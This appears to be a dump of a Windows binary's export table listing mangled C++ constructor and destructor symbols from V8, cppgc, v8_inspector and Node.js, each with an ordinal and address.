                                                                                                                                                                                                        ??0TypedOptimization@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVCompilationDependencies@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@@Z10820x1410792e0
                                                                                                                                                                                                        ??0TypedSlotSet@internal@v8@@QEAA@$$QEAV012@@Z10830x14047d5f0
                                                                                                                                                                                                        ??0TypedSlotSet@internal@v8@@QEAA@AEBV012@@Z10840x14047d5f0
                                                                                                                                                                                                        ??0TypedSlotSet@internal@v8@@QEAA@_K@Z10850x14047d620
                                                                                                                                                                                                        ??0TypedSlots@internal@v8@@QEAA@AEBV012@@Z10860x14047d640
                                                                                                                                                                                                        ??0TypedSlots@internal@v8@@QEAA@XZ10870x14047d660
                                                                                                                                                                                                        ??0Typer@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@V?$Flags@W4Flag@Typer@compiler@internal@v8@@H@base@3@PEAVGraph@123@PEAVTickCounter@23@@Z10880x14107cac0
                                                                                                                                                                                                        ??0UnicodeRangeSplitter@internal@v8@@QEAA@PEAV?$ZoneList@VCharacterRange@internal@v8@@@12@@Z10890x1407325c0
                                                                                                                                                                                                        ??0UnifiedHeapMarkingVerifier@internal@v8@@QEAA@AEAVHeapBase@1cppgc@@@Z10900x1409e6750
                                                                                                                                                                                                        ??0UnifiedHeapMarkingVisitorBase@internal@v8@@QEAA@AEAVHeapBase@1cppgc@@AEAVMarkingStateBase@14@AEAVUnifiedHeapMarkingState@12@@Z10910x1409e66c0
                                                                                                                                                                                                        ??0UnifiedHeapMarkingVisitorBase@internal@v8@@QEAA@AEBV012@@Z10920x1409e66e0
                                                                                                                                                                                                        ??0Unlocker@v8@@QEAA@PEAVIsolate@1@@Z10930x140078f90
                                                                                                                                                                                                        ??0UnoptimizedCompilationInfo@internal@v8@@QEAA@$$QEAV012@@Z10940x140640f40
                                                                                                                                                                                                        ??0UnoptimizedCompilationInfo@internal@v8@@QEAA@AEBV012@@Z10950x140640fc0
                                                                                                                                                                                                        ??0UnoptimizedCompilationInfo@internal@v8@@QEAA@PEAVZone@12@PEAVParseInfo@12@PEAVFunctionLiteral@12@@Z10960x140a7dc20
                                                                                                                                                                                                        ??0UnoptimizedCompileFlags@internal@v8@@AEAA@PEAVIsolate@12@H@Z10970x1407b22c0
                                                                                                                                                                                                        ??0UnoptimizedCompileState@internal@v8@@QEAA@AEBV012@@Z10980x1407b23b0
                                                                                                                                                                                                        ??0UnoptimizedCompileState@internal@v8@@QEAA@PEAVIsolate@12@@Z10990x1407b2400
                                                                                                                                                                                                        ??0UsePosition@compiler@internal@v8@@QEAA@VLifetimePosition@123@PEAVInstructionOperand@123@PEAXW4UsePositionHintType@123@@Z11000x140f7ea10
                                                                                                                                                                                                        ??0Uses@Node@compiler@internal@v8@@QEAA@PEAV1234@@Z11010x140078b40
                                                                                                                                                                                                        ??0Utf8Decoder@internal@v8@@QEAA@AEBV?$Vector@$$CBE@base@2@@Z11020x1406bce30
                                                                                                                                                                                                        ??0Utf8Value@String@v8@@QEAA@PEAVIsolate@2@V?$Local@VValue@v8@@@2@@Z11030x140b06de0
                                                                                                                                                                                                        ??0V8ContextInfo@v8_inspector@@QEAA@V?$Local@VContext@v8@@@v8@@HVStringView@1@@Z11040x14042df00
                                                                                                                                                                                                        ??0V8HeapExplorer@internal@v8@@QEAA@PEAVHeapSnapshot@12@PEAVSnapshottingProgressReportingInterface@12@PEAVObjectNameResolver@HeapProfiler@2@@Z11050x140752260
                                                                                                                                                                                                        ??0V8Inspector@v8_inspector@@QEAA@AEBV01@@Z11060x14042df40
                                                                                                                                                                                                        ??0V8Inspector@v8_inspector@@QEAA@XZ11070x14042df40
                                                                                                                                                                                                        ??0V8InspectorClient@v8_inspector@@QEAA@AEBV01@@Z11080x14042df50
                                                                                                                                                                                                        ??0V8InspectorClient@v8_inspector@@QEAA@XZ11090x14042df50
                                                                                                                                                                                                        ??0V8InspectorSession@v8_inspector@@QEAA@AEBV01@@Z11100x14042df60
                                                                                                                                                                                                        ??0V8InspectorSession@v8_inspector@@QEAA@XZ11110x14042df60
                                                                                                                                                                                                        ??0V8StackTrace@v8_inspector@@QEAA@AEBV01@@Z11120x14042df70
                                                                                                                                                                                                        ??0V8StackTrace@v8_inspector@@QEAA@XZ11130x14042df70
                                                                                                                                                                                                        ??0V8StackTraceId@v8_inspector@@QEAA@VStringView@1@@Z11140x14065e770
                                                                                                                                                                                                        ??0V8StackTraceId@v8_inspector@@QEAA@XZ11150x14065eae0
                                                                                                                                                                                                        ??0V8StackTraceId@v8_inspector@@QEAA@_KU?$pair@_J_J@std@@@Z11160x14065eb20
                                                                                                                                                                                                        ??0V8StackTraceId@v8_inspector@@QEAA@_KU?$pair@_J_J@std@@_N@Z11170x14065eb40
                                                                                                                                                                                                        ??0Value@String@v8@@QEAA@PEAVIsolate@2@V?$Local@VValue@v8@@@2@@Z11180x140b06f40
                                                                                                                                                                                                        ??0ValueDeserializer@v8@@QEAA@PEAVIsolate@1@PEBE_K@Z11190x140b07170
                                                                                                                                                                                                        ??0ValueDeserializer@v8@@QEAA@PEAVIsolate@1@PEBE_KPEAVDelegate@01@@Z11200x140b07190
                                                                                                                                                                                                        ??0ValueNumberingReducer@compiler@internal@v8@@QEAA@AEBV0123@@Z11210x140f0bc10
                                                                                                                                                                                                        ??0ValueNumberingReducer@compiler@internal@v8@@QEAA@PEAVZone@23@0@Z11220x1410849c0
                                                                                                                                                                                                        ??0ValueSerializer@v8@@QEAA@PEAVIsolate@1@@Z11230x140b07220
                                                                                                                                                                                                        ??0ValueSerializer@v8@@QEAA@PEAVIsolate@1@PEAVDelegate@01@@Z11240x140b07290
                                                                                                                                                                                                        ??0VirtualMemory@internal@cppgc@@QEAA@$$QEAV012@@Z11250x140451460
                                                                                                                                                                                                        ??0VirtualMemory@internal@cppgc@@QEAA@PEAVPageAllocator@v8@@_K1PEAX@Z11260x140451490
                                                                                                                                                                                                        ??0VirtualMemory@internal@cppgc@@QEAA@XZ11270x14007b730
                                                                                                                                                                                                        ??0VirtualMemory@internal@v8@@QEAA@PEAVPageAllocator@2@_KPEAX1W4JitPermission@012@@Z11280x1406b5220
                                                                                                                                                                                                        ??0VirtualMemory@internal@v8@@QEAA@XZ11290x14007b730
                                                                                                                                                                                                        ??0Visitor@cppgc@@QEAA@AEBV01@@Z11300x14044f630
                                                                                                                                                                                                        ??0Visitor@cppgc@@QEAA@VKey@01@@Z11310x14044f630
                                                                                                                                                                                                        ??0VoidDescriptor@internal@v8@@IEAA@W4Key@CallDescriptors@12@@Z11320x1404b9be0
                                                                                                                                                                                                        ??0VoidDescriptor@internal@v8@@QEAA@XZ11330x1404baaf0
                                                                                                                                                                                                        ??0WasmCode@wasm@internal@v8@@AEAA@PEAVNativeModule@123@HV?$Vector@E@base@3@HIHHHHHV?$Vector@$$CBE@63@22W4Kind@0123@W4ExecutionTier@123@W4ForDebugging@123@@Z11340x14047d680
                                                                                                                                                                                                        ??0WasmCodeManager@wasm@internal@v8@@QEAA@XZ11350x1405665e0
                                                                                                                                                                                                        ??0WasmCodeRefScope@wasm@internal@v8@@QEAA@XZ11360x140566660
                                                                                                                                                                                                        ??0WasmCompilationUnit@wasm@internal@v8@@QEAA@HW4ExecutionTier@123@W4ForDebugging@123@@Z11370x140527c30
                                                                                                                                                                                                        ??0WasmDebugSymbols@wasm@internal@v8@@QEAA@XZ11380x14047d7f0
                                                                                                                                                                                                        ??0WasmEngine@wasm@internal@v8@@QEAA@XZ11390x140553770
                                                                                                                                                                                                        ??0WasmError@wasm@internal@v8@@QEAA@$$QEAV0123@@Z11400x140527c40
                                                                                                                                                                                                        ??0WasmError@wasm@internal@v8@@QEAA@AEBV0123@@Z11410x140527c80
                                                                                                                                                                                                        ??0WasmError@wasm@internal@v8@@QEAA@IPEBDZZ11420x140527cb0
                                                                                                                                                                                                        ??0WasmError@wasm@internal@v8@@QEAA@IV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z11430x140527dd0
                                                                                                                                                                                                        ??0WasmError@wasm@internal@v8@@QEAA@XZ11440x140527e10
                                                                                                                                                                                                        ??0WasmExceptionPackage@internal@v8@@IEAA@_K@Z11450x140078b40
                                                                                                                                                                                                        ??0WasmExceptionPackage@internal@v8@@QEAA@XZ11460x1400fba60
                                                                                                                                                                                                        ??0WasmFunctionBuilder@wasm@internal@v8@@AEAA@PEAVWasmModuleBuilder@123@@Z11470x14053d7e0
                                                                                                                                                                                                        ??0WasmFunctionBuilder@wasm@internal@v8@@QEAA@$$QEAV0123@@Z11480x14053d990
                                                                                                                                                                                                        ??0WasmFunctionBuilder@wasm@internal@v8@@QEAA@AEBV0123@@Z11490x14053dbe0
                                                                                                                                                                                                        ??0WasmGraphBuilder@compiler@internal@v8@@IEAA@PEAUCompilationEnv@wasm@23@PEAVZone@23@PEAVMachineGraph@123@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@PEAVSourcePositionTable@123@PEAVIsolate@23@@Z11500x140eeb310
                                                                                                                                                                                                        ??0WasmGraphBuilder@compiler@internal@v8@@QEAA@PEAUCompilationEnv@wasm@23@PEAVZone@23@PEAVMachineGraph@123@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@PEAVSourcePositionTable@123@@Z11510x140527e30
                                                                                                                                                                                                        ??0WasmInstanceObject@internal@v8@@IEAA@_K@Z11520x140078b40
                                                                                                                                                                                                        ??0WasmInstanceObject@internal@v8@@QEAA@XZ11530x1400fba60
                                                                                                                                                                                                        ??0WasmModule@wasm@internal@v8@@QEAA@V?$unique_ptr@VZone@internal@v8@@U?$default_delete@VZone@internal@v8@@@std@@@std@@@Z11540x1405381a0
                                                                                                                                                                                                        ??0WasmModuleBuilder@wasm@internal@v8@@QEAA@PEAVZone@23@@Z11550x14053dd90
                                                                                                                                                                                                        ??0WasmModuleObjectBuilderStreaming@v8@@AEAA@$$QEAV01@@Z11560x1400795b0
                                                                                                                                                                                                        ??0WasmModuleObjectBuilderStreaming@v8@@QEAA@PEAVIsolate@1@@Z11570x140b06850
                                                                                                                                                                                                        ??0WasmModuleSourceMap@wasm@internal@v8@@QEAA@$$QEAV0123@@Z11580x14047d800
                                                                                                                                                                                                        ??0WasmModuleSourceMap@wasm@internal@v8@@QEAA@AEBV0123@@Z11590x14047d8b0
                                                                                                                                                                                                        ??0WasmModuleSourceMap@wasm@internal@v8@@QEAA@PEAVIsolate@3@V?$Local@VString@v8@@@3@@Z11600x14053bb20
                                                                                                                                                                                                        ??0WasmSerializer@wasm@internal@v8@@QEAA@PEAVNativeModule@123@@Z11610x140527e70
                                                                                                                                                                                                        ??0WasmStreaming@v8@@QEAA@V?$unique_ptr@VWasmStreamingImpl@WasmStreaming@v8@@U?$default_delete@VWasmStreamingImpl@WasmStreaming@v8@@@std@@@std@@@Z11620x140543cc0
                                                                                                                                                                                                        ??0WeakCodeRegistry@internal@v8@@QEAA@AEBV012@@Z11630x1407448f0
                                                                                                                                                                                                        ??0WeakCodeRegistry@internal@v8@@QEAA@PEAVIsolate@12@@Z11640x1404b9c40
                                                                                                                                                                                                        ??0WebSnapshotDeserializer@internal@v8@@QEAA@PEAVIsolate@2@@Z11650x1406ac130
                                                                                                                                                                                                        ??0WebSnapshotSerializer@internal@v8@@QEAA@PEAVIsolate@2@@Z11660x1406ac1a0
                                                                                                                                                                                                        ??0Zone@internal@v8@@QEAA@PEAVAccountingAllocator@12@PEBD_N@Z11670x1406abc00
                                                                                                                                                                                                        ??0ZonePreparseData@internal@v8@@QEAA@PEAVZone@12@PEAV?$Vector@E@base@2@H@Z11680x14079fd00
                                                                                                                                                                                                        ??0ZoneStats@compiler@internal@v8@@QEAA@PEAVAccountingAllocator@23@@Z11690x14104c5d0
                                                                                                                                                                                                        ??0iterator@JumpTableTargetOffsets@interpreter@internal@v8@@QEAA@HHHPEBVBytecodeArrayIterator@234@@Z11700x1409136a0
                                                                                                                                                                                                        ??0iterator@StateValuesAccess@compiler@internal@v8@@AEAA@PEAVNode@234@@Z11710x140f56cc0
                                                                                                                                                                                                        ??0iterator@StateValuesAccess@compiler@internal@v8@@AEAA@XZ11720x140ed33a0
                                                                                                                                                                                                        ??1?$Deserializer@VIsolate@internal@v8@@@internal@v8@@UEAA@XZ11730x1406d6100
                                                                                                                                                                                                        ??1?$Deserializer@VLocalIsolate@internal@v8@@@internal@v8@@UEAA@XZ11740x1406d6550
                                                                                                                                                                                                        ??1?$ParserBase@VParser@internal@v8@@@internal@v8@@QEAA@XZ11750x140773140
                                                                                                                                                                                                        ??1?$PerThreadAssertScope@$00$00@internal@v8@@QEAA@XZ11760x140a7d8e0
                                                                                                                                                                                                        ??1?$PerThreadAssertScope@$00$0A@@internal@v8@@QEAA@XZ11770x140a7d8e0
                                                                                                                                                                                                        ??1?$PerThreadAssertScope@$01$00@internal@v8@@QEAA@XZ11780x140a7d8e0
                                                                                                                                                                                                        ??1?$PerThreadAssertScope@$01$0A@@internal@v8@@QEAA@XZ11790x140a7d8e0
                                                                                                                                                                                                        ??1?$PerThreadAssertScope@$02$00@internal@v8@@QEAA@XZ11800x140a7d8e0
                                                                                                                                                                                                        ??1?$PerThreadAssertScope@$02$0A@@internal@v8@@QEAA@XZ11810x140a7d8e0
                                                                                                                                                                                                        ??1?$PerThreadAssertScope@$03$00@internal@v8@@QEAA@XZ11820x140a7d8e0
                                                                                                                                                                                                        ??1?$PerThreadAssertScope@$03$0A@@internal@v8@@QEAA@XZ11830x140a7d8e0
                                                                                                                                                                                                        ??1?$PerThreadAssertScope@$04$00@internal@v8@@QEAA@XZ11840x140a7d8e0
                                                                                                                                                                                                        ??1?$PerThreadAssertScope@$04$0A@@internal@v8@@QEAA@XZ11850x140a7d8e0
                                                                                                                                                                                                        ??1?$PerThreadAssertScope@$05$0A@@internal@v8@@QEAA@XZ11860x140a7d8e0
                                                                                                                                                                                                        ??1?$PerThreadAssertScope@$0A@$00@internal@v8@@QEAA@XZ11870x140a7d8e0
                                                                                                                                                                                                        ??1?$PerThreadAssertScope@$0A@$0A@@internal@v8@@QEAA@XZ11880x140a7d8e0
                                                                                                                                                                                                        ??1?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@QEAA@XZ11890x14047dda0
                                                                                                                                                                                                        ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ11900x1400eff60
                                                                                                                                                                                                        ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ11910x1400eff70
                                                                                                                                                                                                        ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ11920x1400f0020
                                                                                                                                                                                                        ??1?$enable_shared_from_this@VCounters@V8Inspector@v8_inspector@@@std@@IEAA@XZ11930x14042dff0
                                                                                                                                                                                                        ??1?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@XZ11940x14047dda0
                                                                                                                                                                                                        ??1?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@XZ11950x14007b760
                                                                                                                                                                                                        ??1?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@XZ11960x14007b3d0
                                                                                                                                                                                                        ??1AccountingAllocator@internal@v8@@UEAA@XZ11970x1406abee0
                                                                                                                                                                                                        ??1ActivityControl@v8@@UEAA@XZ11980x140078990
                                                                                                                                                                                                        ??1AddTypeAssertionsReducer@compiler@internal@v8@@UEAA@XZ11990x140f6cd60
                                                                                                                                                                                                        ??1AddressToTraceMap@internal@v8@@QEAA@XZ12000x140752430
                                                                                                                                                                                                        ??1AllocationProfile@v8@@UEAA@XZ12010x140078990
                                                                                                                                                                                                        ??1Allocator@ArrayBuffer@v8@@UEAA@XZ12020x140078990
                                                                                                                                                                                                        ??1AllowCompilation@internal@v8@@QEAA@XZ12030x140a7d910
                                                                                                                                                                                                        ??1AllowDeoptimization@internal@v8@@QEAA@XZ12040x140a7d920
                                                                                                                                                                                                        ??1AllowExceptions@internal@v8@@QEAA@XZ12050x140a7d930
                                                                                                                                                                                                        ??1AllowJavascriptExecution@internal@v8@@QEAA@XZ12060x140a7d940
                                                                                                                                                                                                        ??1AllowJavascriptExecutionScope@Isolate@v8@@QEAA@XZ12070x140b07430
                                                                                                                                                                                                        ??1ArrayBufferAllocator@node@@UEAA@XZ12080x140078990
                                                                                                                                                                                                        ??1AsmCallableType@wasm@internal@v8@@MEAA@XZ12090x140078990
                                                                                                                                                                                                        ??1AsmFunctionType@wasm@internal@v8@@UEAA@XZ12100x1404bad50
                                                                                                                                                                                                        ??1AsmJsOffsetInformation@wasm@internal@v8@@QEAA@XZ12110x140538860
                                                                                                                                                                                                        ??1AsmJsScanner@internal@v8@@QEAA@XZ12120x1406361f0
                                                                                                                                                                                                        ??1AsmOverloadedFunctionType@wasm@internal@v8@@UEAA@XZ12130x14047e1b0
                                                                                                                                                                                                        ??1Assembler@internal@v8@@UEAA@XZ12140x14049b5a0
                                                                                                                                                                                                        ??1AssemblerBase@internal@v8@@UEAA@XZ12150x140ab3d20
                                                                                                                                                                                                        ??1AsyncResource@node@@UEAA@XZ12160x140290940
                                                                                                                                                                                                        ??1AsyncStreamingDecoder@wasm@internal@v8@@UEAA@XZ12170x1405713f0
                                                                                                                                                                                                        ??1BackgroundCompileTask@internal@v8@@QEAA@XZ12180x140aa6330
                                                                                                                                                                                                        ??1BackingStore@internal@v8@@QEAA@XZ12190x1408c8f20
                                                                                                                                                                                                        ??1BackingStore@v8@@QEAA@XZ12200x140b07470
                                                                                                                                                                                                        ??1BackupIncumbentScope@Context@v8@@QEAA@XZ12210x140b07480
                                                                                                                                                                                                        ??1BaseSpace@internal@cppgc@@QEAA@XZ12220x14044f640
                                                                                                                                                                                                        ??1BaseSpace@internal@v8@@MEAA@XZ12230x140078990
                                                                                                                                                                                                        ??1BasicBlock@compiler@internal@v8@@QEAA@XZ12240x1404c1680
                                                                                                                                                                                                        ??1Binary@protocol@v8_inspector@@QEAA@XZ12250x14007c830
                                                                                                                                                                                                        ??1BlockBuilder@interpreter@internal@v8@@UEAA@XZ12260x1408f2d30
                                                                                                                                                                                                        ??1BlockData@Coverage@debug@v8@@QEAA@XZ12270x14047db00
                                                                                                                                                                                                        ??1BoundedPageAllocator@base@v8@@UEAA@XZ12280x140e688d0
                                                                                                                                                                                                        ??1BranchElimination@compiler@internal@v8@@UEAA@XZ12290x140f8e6c0
                                                                                                                                                                                                        ??1BranchHintMap@wasm@internal@v8@@QEAA@XZ12300x14047db50
                                                                                                                                                                                                        ??1BreakableControlFlowBuilder@interpreter@internal@v8@@UEAA@XZ12310x1408f2d40
                                                                                                                                                                                                        ??1BytecodeAnalysis@compiler@internal@v8@@QEAA@XZ12320x140f91b60
                                                                                                                                                                                                        ??1BytecodeArrayBuilder@interpreter@internal@v8@@QEAA@XZ12330x1408f0940
                                                                                                                                                                                                        ??1BytecodeArrayIterator@interpreter@internal@v8@@QEAA@XZ12340x1409136e0
                                                                                                                                                                                                        ??1BytecodeArrayRandomIterator@interpreter@internal@v8@@QEAA@XZ12350x140913120
                                                                                                                                                                                                        ??1BytecodeArrayWriter@interpreter@internal@v8@@QEAA@XZ12360x1408f09b0
                                                                                                                                                                                                        ??1BytecodeIterator@wasm@internal@v8@@UEAA@XZ12370x140527f90
                                                                                                                                                                                                        ??1BytecodeLabels@interpreter@internal@v8@@QEAA@XZ12380x1408f0aa0
                                                                                                                                                                                                        ??1BytecodeLivenessMap@compiler@internal@v8@@QEAA@XZ12390x140078990
                                                                                                                                                                                                        ??1BytecodeOffsetIterator@baseline@internal@v8@@QEAA@XZ12400x140ae5980
                                                                                                                                                                                                        ??1BytecodeRegisterOptimizer@interpreter@internal@v8@@UEAA@XZ12410x1408f7c60
                                                                                                                                                                                                        ??1CachedData@ScriptCompiler@v8@@QEAA@XZ12420x140b074a0
                                                                                                                                                                                                        ??1CallbackScope@AsyncResource@node@@QEAA@XZ12430x14007a140
                                                                                                                                                                                                        ??1CallbackScope@node@@QEAA@XZ12440x14028f7e0
                                                                                                                                                                                                        ??1Cancelable@internal@v8@@UEAA@XZ12450x1406b7f70
                                                                                                                                                                                                        ??1CancelableTask@internal@v8@@UEAA@XZ12460x14047db60
                                                                                                                                                                                                        ??1CancelableTaskManager@internal@v8@@QEAA@XZ12470x1406b7fa0
                                                                                                                                                                                                        ??1CanonicalHandleScope@internal@v8@@QEAA@XZ12480x1409f45c0
                                                                                                                                                                                                        ??1Channel@V8Inspector@v8_inspector@@UEAA@XZ12490x140078990
                                                                                                                                                                                                        ??1CheckpointElimination@compiler@internal@v8@@UEAA@XZ12500x140078990
                                                                                                                                                                                                        ??1ClassScope@internal@v8@@QEAA@XZ12510x140078990
                                                                                                                                                                                                        ??1CodeAssembler@compiler@internal@v8@@QEAA@XZ12520x140078990
                                                                                                                                                                                                        ??1CodeAssemblerLabel@compiler@internal@v8@@QEAA@XZ12530x140f1cfe0
                                                                                                                                                                                                        ??1CodeAssemblerState@compiler@internal@v8@@QEAA@XZ12540x140f1d0e0
                                                                                                                                                                                                        ??1CodeAssemblerVariable@compiler@internal@v8@@IEAA@XZ12550x140f1d230
                                                                                                                                                                                                        ??1CodeEntryStorage@internal@v8@@QEAA@XZ12560x140744990
                                                                                                                                                                                                        ??1CodeEventHandler@v8@@UEAA@XZ12570x140b074b0
                                                                                                                                                                                                        ??1CodeEventLogger@internal@v8@@UEAA@XZ12580x1408d1450
                                                                                                                                                                                                        ??1CodeGenerator@compiler@internal@v8@@UEAA@XZ12590x1404e3000
                                                                                                                                                                                                        ??1CodeMap@internal@v8@@QEAA@XZ12600x14074d080
                                                                                                                                                                                                        ??1CodeObjectRegistry@internal@v8@@QEAA@XZ12610x140245bf0
                                                                                                                                                                                                        ??1CodeRange@internal@v8@@UEAA@XZ12620x1409f1ba0
                                                                                                                                                                                                        ??1CodeSpaceWriteScope@wasm@internal@v8@@QEAA@XZ12630x1405d7750
                                                                                                                                                                                                        ??1CombinedHeapObjectIterator@internal@v8@@QEAA@XZ12640x1406d90d0
                                                                                                                                                                                                        ??1CommandLineAPIScope@V8InspectorSession@v8_inspector@@UEAA@XZ12650x140078990
                                                                                                                                                                                                        ??1CommonEnvironmentSetup@node@@QEAA@XZ12660x14028eea0
                                                                                                                                                                                                        ??1CommonOperatorReducer@compiler@internal@v8@@UEAA@XZ12670x140078990
                                                                                                                                                                                                        ??1CompactionSpace@internal@v8@@UEAA@XZ12680x14047db70
                                                                                                                                                                                                        ??1Compactor@internal@cppgc@@QEAA@XZ12690x14044f6b0
                                                                                                                                                                                                        ??1CompilationDependencies@compiler@internal@v8@@QEAA@XZ12700x1404505a0
                                                                                                                                                                                                        ??1CompilationHandleScope@internal@v8@@QEAA@XZ12710x140aa6470
                                                                                                                                                                                                        ??1CompilationJob@internal@v8@@UEAA@XZ12720x140078990
                                                                                                                                                                                                        ??1CompilationResultResolver@wasm@internal@v8@@UEAA@XZ12730x140078990
                                                                                                                                                                                                        ??1CompilationState@wasm@internal@v8@@QEAA@XZ12740x140594240
                                                                                                                                                                                                        ??1CompiledWasmModule@v8@@QEAA@XZ12750x140079450
                                                                                                                                                                                                        ??1ConcurrentMarker@internal@cppgc@@UEAA@XZ12760x14044f760
                                                                                                                                                                                                        ??1ConcurrentMarkerBase@internal@cppgc@@UEAA@XZ12770x140467d00
                                                                                                                                                                                                        ??1ConcurrentMarking@internal@v8@@QEAA@XZ12780x14047dc10
                                                                                                                                                                                                        ??1ConcurrentMarkingVisitor@internal@cppgc@@UEAA@XZ12790x140078990
                                                                                                                                                                                                        ??1ConcurrentUnifiedHeapMarkingVisitor@internal@v8@@UEAA@XZ12800x140078990
                                                                                                                                                                                                        ??1ConditionVariable@base@v8@@QEAA@XZ12810x140078990
                                                                                                                                                                                                        ??1ConditionalControlFlowBuilder@interpreter@internal@v8@@UEAA@XZ12820x1408f2db0
                                                                                                                                                                                                        ??1ConstantArrayBuilder@interpreter@internal@v8@@QEAA@XZ12830x1408f0ab0
                                                                                                                                                                                                        ??1ConstantFoldingReducer@compiler@internal@v8@@UEAA@XZ12840x140fa0480
                                                                                                                                                                                                        ??1ContextDeserializer@internal@v8@@UEAA@XZ12850x1406c1c40
                                                                                                                                                                                                        ??1ContextSerializer@internal@v8@@UEAA@XZ12860x1406d90f0
                                                                                                                                                                                                        ??1ControlEquivalence@compiler@internal@v8@@QEAA@XZ12870x1404afbf0
                                                                                                                                                                                                        ??1ControlFlowBuilder@interpreter@internal@v8@@UEAA@XZ12880x140078990
                                                                                                                                                                                                        ??1ControlFlowOptimizer@compiler@internal@v8@@QEAA@XZ12890x140f0bc50
                                                                                                                                                                                                        ??1Counters@V8Inspector@v8_inspector@@QEAA@XZ12900x1406726e0
                                                                                                                                                                                                        ??1Coverage@debug@v8@@QEAA@XZ12910x14007c830
                                                                                                                                                                                                        ??1CppHeap@internal@v8@@UEAA@XZ12920x1409e89f0
                                                                                                                                                                                                        ??1CppHeap@v8@@UEAA@XZ12930x140078990
                                                                                                                                                                                                        ??1CppHeapCreateParams@v8@@QEAA@XZ12940x140952570
                                                                                                                                                                                                        ??1CpuFeatureScope@internal@v8@@QEAA@XZ12950x140078990
                                                                                                                                                                                                        ??1CpuProfileDeoptInfo@v8@@QEAA@XZ12960x140079dd0
                                                                                                                                                                                                        ??1CpuProfiler@internal@v8@@QEAA@XZ12970x140760810
                                                                                                                                                                                                        ??1CpuProfilesCollection@internal@v8@@QEAA@XZ12980x1407449a0
                                                                                                                                                                                                        ??1CreateParams@Isolate@v8@@QEAA@XZ12990x140b074d0
                                                                                                                                                                                                        ??1CrossThreadPersistentRegion@internal@cppgc@@QEAA@XZ13000x140457650
                                                                                                                                                                                                        ??1CsaLoadElimination@compiler@internal@v8@@UEAA@XZ13010x140f0bc80
                                                                                                                                                                                                        ??1DateCache@internal@v8@@UEAA@XZ13020x1407058d0
                                                                                                                                                                                                        ??1DbgStreamBuf@internal@v8@@UEAA@XZ13030x1406b3ae0
                                                                                                                                                                                                        ??1DeadCodeElimination@compiler@internal@v8@@UEAA@XZ13040x140078990
                                                                                                                                                                                                        ??1Debug@internal@v8@@AEAA@XZ13050x140a5c8e0
                                                                                                                                                                                                        ??1DebugInfo@wasm@internal@v8@@QEAA@XZ13060x14055ef10
                                                                                                                                                                                                        ??1DeclarationScope@internal@v8@@QEAA@XZ13070x140078990
                                                                                                                                                                                                        ??1DecompressionOptimizer@compiler@internal@v8@@QEAA@XZ13080x140f0bcb0
                                                                                                                                                                                                        ??1DefaultEmbedderRootsHandler@internal@v8@@UEAA@XZ13090x140078990
                                                                                                                                                                                                        ??1DefaultPlatform@cppgc@@UEAA@XZ13100x1404674b0
                                                                                                                                                                                                        ??1Delegate@ValueDeserializer@v8@@UEAA@XZ13110x140078990
                                                                                                                                                                                                        ??1Delegate@ValueSerializer@v8@@UEAA@XZ13120x140078990
                                                                                                                                                                                                        ??1DisallowCompilation@internal@v8@@QEAA@XZ13130x140a7d910
                                                                                                                                                                                                        ??1DisallowDeoptimization@internal@v8@@QEAA@XZ13140x140a7d920
                                                                                                                                                                                                        ??1DisallowExceptions@internal@v8@@QEAA@XZ13150x140a7d930
                                                                                                                                                                                                        ??1DisallowGarbageCollectionScope@subtle@cppgc@@QEAA@XZ13160x140464ff0
                                                                                                                                                                                                        ??1DisallowJavascriptExecution@internal@v8@@QEAA@XZ13170x140a7d940
                                                                                                                                                                                                        ??1DisallowJavascriptExecutionScope@Isolate@v8@@QEAA@XZ13180x140b07530
                                                                                                                                                                                                        ??1DiscardedSamplesDelegate@v8@@UEAA@XZ13190x140078990
                                                                                                                                                                                                        ??1DisjointAllocationPool@wasm@internal@v8@@QEAA@XZ13200x14047dd30
                                                                                                                                                                                                        ??1Domain@API@Schema@protocol@v8_inspector@@UEAA@XZ13210x14042e010
                                                                                                                                                                                                        ??1DumpOnJavascriptExecution@internal@v8@@QEAA@XZ13220x140a7d950
                                                                                                                                                                                                        ??1EhFrameWriter@internal@v8@@QEAA@XZ13230x1404afbf0
                                                                                                                                                                                                        ??1EmbedderGraph@v8@@UEAA@XZ13240x140078990
                                                                                                                                                                                                        ??1EmbedderHeapTracer@v8@@UEAA@XZ13250x140078990
                                                                                                                                                                                                        ??1EmbedderRootsHandler@v8@@UEAA@XZ13260x140078990
                                                                                                                                                                                                        ??1EmbedderStackStateScope@internal@v8@@QEAA@XZ13270x140952580
                                                                                                                                                                                                        ??1Entry@TypeProfile@debug@v8@@QEAA@XZ13280x14047db00
                                                                                                                                                                                                        ??1ErrorThrower@wasm@internal@v8@@QEAA@XZ13290x14052b220
                                                                                                                                                                                                        ??1EscapableHandleScope@v8@@QEAA@XZ13300x140078ab0
                                                                                                                                                                                                        ??1EscapeAnalysis@compiler@internal@v8@@QEAA@XZ13310x140f0bd00
                                                                                                                                                                                                        ??1EscapeAnalysisReducer@compiler@internal@v8@@UEAA@XZ13320x140f0be10
                                                                                                                                                                                                        ??1Exported@protocol@v8_inspector@@UEAA@XZ13330x14042e010
                                                                                                                                                                                                        ??1Extension@v8@@UEAA@XZ13340x140078de0
                                                                                                                                                                                                        ??1ExternalMarkingWorklist@MarkingWorklists@internal@cppgc@@QEAA@XZ13350x140459be0
                                                                                                                                                                                                        ??1ExternalOneByteStringResource@String@v8@@UEAA@XZ13360x140078990
                                                                                                                                                                                                        ??1ExternalPointerTable@internal@v8@@QEAA@XZ13370x14047dd90
                                                                                                                                                                                                        ??1ExternalResourceVisitor@v8@@UEAA@XZ13380x140078990
